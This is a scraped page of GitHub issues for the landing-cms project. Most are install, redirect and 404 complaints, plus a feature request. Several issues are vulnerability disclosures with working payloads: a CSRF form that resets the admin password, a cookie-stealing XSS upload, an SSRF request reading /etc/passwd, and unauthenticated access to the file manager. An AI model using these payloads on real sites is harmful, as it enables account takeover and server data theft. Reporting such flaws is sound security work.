elias-black / landing-cms Goto Github PK

Развернул, При обращении к инсталл все доступы есть,
добавил руками

при переходе к cms вот такая штука

Хотя по идее должно быть задание пароля. ставил на php 5.6, хотя пробовал и 5.2 результат тот же. Не скажите где не досмотрел?

Hello, thx for this app. the issue is.... I cant install this cms. Then change all permissions, go to /cms pannel and error 404. My url project is http://localhost:44333/www/test-cms/ When i want to go to http://localhost:44333/www/test-cms/ the app redirect to http://localhost:44333/cms/
Thx for u help.

PD: This issue also happens in live server.

Warning: file_get_contents(E:\openserver\OpenServer\domains\shpagin.time/cms/_db/public.php): failed to open stream: No such file or directory in E:\openserver\OpenServer\domains\shpagin.time\web\index.php on line 24

Warning: file_get_contents(E:\openserver\OpenServer\domains\shpagin.time/cms/_db/password.php): failed to open stream: No such file or directory in E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\db.class.php on line 112

Warning: Cannot modify header information - headers already sent by (output started at E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\db.class.php:112) in E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\utils.class.php on line 37

http://192.168.18.130/cms/password/

I can change the admin's password when admin click the csrf html file.

payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.18.130/cms/password/" method="POST">
      <input type="hidden" name="pwd1" value="12345" />
      <input type="hidden" name="pwd2" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

http://infozavri.my.to/cms/
some blocks are not appear on the front-end,
but appear on back-end.
password: *** (removed after 2 days of no-answer)
Landing-CMS dead as many others...

First access the file management page, then click new file to upload the file, select the html file format.

http://192.168.187.2/assets/vendor/responsive_filemanager_9.12.1/filemanager/dialog.php

payload:<script>alert(document.cookie)</scrtipt>

When we input the file content as payload, we find that the front end does not allow input /, so we can capture the package and modify the content or paste the payload directly into the file content.

Right-click the file and select "show url", open the file URL to trigger xss.

When the administrator opens the file after uploading the file, it can also trigger xss.

A SSRF vulnerability was discovered in landing-cms .here is a SSRF vulnerability that allows attackers to read server sensitive information. via /assets/vendor/responsive_filemanager_9.12.1/filemanager/upload.php
post: fldr=test11&url=file:///etc/passwd

and then cos would touch a file named fldr and the name of ssrf file

so attackers can read server sensitive information

Здравствуйте, Илья!
Ваша CMS просто идеальна, и проста. Это именно то, что я не раз начинал писать, бросал из-за горящих сроков и откладывал в долгий ящик.
Единственное, чего очень не хватает - это реализации мультиполей. Это полезно, когда например на лендинге галерея изображений, или список партнеров, или например каталог продукции.
Это дополнение очень сильно облегчит мне жизнь, поэтому я даже готов отблагодарить финансово.
Так же было бы круто, среди типов полей видеть селекты и выбор файла.
Если что, пишите на почту: [email protected]

First of all, I did not enter the password to access and found it was blocked.

http://192.168.187.2/cms/

But I can still access the file management page.

http://192.168.187.2/assets/vendor/responsive_filemanager_9.12.1/filemanager/dialog.php

The normal logical operation is to first enter the password to access the main page, then click add filed, create the type as file uploader, and finally we can upload files in the main page.

whenever click on http://localhost/cms/cms/ it's redirecting to http://localhost/cms/password/ and showing 404 error...